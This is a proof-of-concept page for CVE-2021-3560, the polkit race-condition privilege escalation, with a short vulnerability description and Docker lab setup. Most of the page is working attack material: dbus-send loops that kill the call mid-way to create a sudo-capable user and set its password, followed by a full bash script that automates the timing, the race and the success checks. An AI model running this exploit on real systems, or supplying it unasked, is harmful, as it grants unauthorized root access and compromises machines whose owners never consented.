CVE-2021-3560 PoC: polkit code issue vulnerability

Related vulnerability
Title: polkit code issue vulnerability (CVE-2021-3560)
Description: polkit is the component that controls system-wide privileges on Unix-like operating systems; it defines and checks authorization rules that mediate requests between processes of different privilege levels. polkit contains a code issue vulnerability: when the requesting process disconnects from dbus-daemon before polkit_system_bus_name_get_creds_sync is called, polkit cannot obtain the requester's unique uid and pid and therefore cannot verify its privileges. The resulting error is mishandled, so the credential check is bypassed and the requested action is carried out with root privileges.
Introduction
# CVE-2021-3560-Polkit-Privilege-Escalation
by Mark, Qingchen Yu
To build the container:
```
docker build -t <image tag of your choice> .
```
To run the container:
```
docker run -it <image tag name>
```

1. Start with `start.sh`.

2. Measure execution time:
   Time one complete (rejected) CreateUser call. Note the 'real' time and calculate half of it.
   ```
   time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
   ```

3. Create a user with sudo privileges:
   Replace X.XXX with half of the 'real' time from step 2. Killing dbus-send mid-call makes the client disconnect from the bus after accountsservice has asked polkit for authorization but before polkit has looked up the caller's uid, which is the window the bug opens. The command runs as a loop of 10000 iterations; because the timing is not deterministic you may need to run this step several times. `int32:1` requests an administrator account, which is why the user ends up with sudo rights.
   ```
   for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!; done
   ```

4. Check user creation:
   ```
   id samurai
   ```
   It should show that the samurai user exists and list its groups. Run step 3 again if not.

5. Generate a password hash:
   In this case the password is 'iamsamurai'. Note the hash generated.
   ```
   openssl passwd -5 iamsamurai
   ```

6. Set the password for the new user:
   Replace X.XXX with the sleep duration from step 3 and 'Password Hash' with the hash from step 5. Replace UUUU with the numeric user ID of 'samurai' (`id -u samurai`). The second string argument (`GoldenEye`) is the password hint.
   ```
   for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!; done
   ```

7. Switch to the new user with the password you created in step 5:
   ```
   su - samurai
   ```

   You should now be able to use sudo as this user.
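The steps above can be scripted so that the timing is measured once, the race stops as soon as `id` reports the user, and the password race reuses the same delay. The following is an added example and not the original PoC's code; it assumes bash, GNU coreutils (fractional `sleep`), `dbus-send` and accountsservice on the target, and the user name, password and hint are illustrative values.

```shell
#!/usr/bin/env bash
# Added example, not part of the original PoC: automate the timing measurement,
# the CreateUser race and the SetPassword race from the steps above, checking
# after each attempt instead of always running the full 10000 iterations.
# Assumptions (not from the page): bash, GNU coreutils sleep (fractional
# seconds), dbus-send and accountsservice on the target. The user name,
# password and hint are chosen here for illustration.

NEW_USER=${NEW_USER:-samurai}
NEW_PASS=${NEW_PASS:-iamsamurai}
PASS_HINT=${PASS_HINT:-GoldenEye}
MAX_TRIES=10000

# Parse a `time` "real" line ("real 0m0.012s"), "0m0.012s" or a bare "0.012"
# into seconds printed with 4 decimals.
real_to_seconds() {
  printf '%s\n' "$1" | awk '{
      v = $NF; sub(/s$/, "", v)
      if (index(v, "m") > 0) { split(v, p, "m"); v = p[1] * 60 + p[2] }
      printf "%.4f\n", v
  }'
}

# Half of a duration in seconds: the sleep before killing dbus-send, so the
# client disconnects from the bus roughly mid-way through the call.
half_seconds() {
  awk -v s="$1" 'BEGIN { printf "%.4f\n", s / 2 }'
}

create_user_call() {
  dbus-send --system --dest=org.freedesktop.Accounts --type=method_call \
    --print-reply /org/freedesktop/Accounts \
    org.freedesktop.Accounts.CreateUser "string:$NEW_USER" "string:$NEW_USER" int32:1
}

set_password_call() {  # $1 = uid of the new user, $2 = crypt(3) hash
  dbus-send --system --dest=org.freedesktop.Accounts --type=method_call \
    --print-reply "/org/freedesktop/Accounts/User$1" \
    org.freedesktop.Accounts.User.SetPassword "string:$2" "string:$PASS_HINT"
}

# Time one full (rejected) CreateUser call; TIMEFORMAT=%R makes bash's `time`
# print only the real seconds. Prints half of that value.
measure_delay() {
  local real
  real=$( { TIMEFORMAT=%R; time create_user_call >/dev/null 2>&1; } 2>&1 )
  half_seconds "$(real_to_seconds "$real")"
}

# race DELAY MAX_TRIES CHECK_CMD CMD [ARGS...]
# Start CMD in the background, let it run DELAY seconds, kill it, then run
# CHECK_CMD. Stops on the first successful check; with an empty CHECK_CMD it
# runs the fixed number of attempts and reports success.
race() {
  local delay=$1 max=$2 check=$3 i=1
  shift 3
  while [ "$i" -le "$max" ]; do
    "$@" >/dev/null 2>&1 &
    sleep "$delay"
    kill "$!" 2>/dev/null
    if [ -n "$check" ] && "$check"; then
      echo "succeeded after $i attempts" >&2
      return 0
    fi
    i=$((i + 1))
  done
  [ -z "$check" ]
}

user_exists() { id "$NEW_USER" >/dev/null 2>&1; }

main() {
  local delay uid hash
  delay=$(measure_delay)
  echo "sleep before kill: ${delay}s" >&2
  race "$delay" "$MAX_TRIES" user_exists create_user_call \
    || { echo "CreateUser race did not succeed; rerun" >&2; return 1; }
  uid=$(id -u "$NEW_USER")
  hash=$(openssl passwd -5 "$NEW_PASS")
  # There is no unprivileged way to confirm the new password, so run a fixed
  # batch and let the operator verify with su afterwards.
  race "$delay" 200 "" set_password_call "$uid" "$hash"
  echo "now try: su - $NEW_USER (password: $NEW_PASS), then sudo -l" >&2
}

case "${1:-}" in run) main ;; esac
```

Run it as `./race.sh run`; without the argument it only defines the functions, so the timing helpers can be sourced and tested separately. The CreateUser loop polls `id` after every kill, which is the check the original step 4 does by hand.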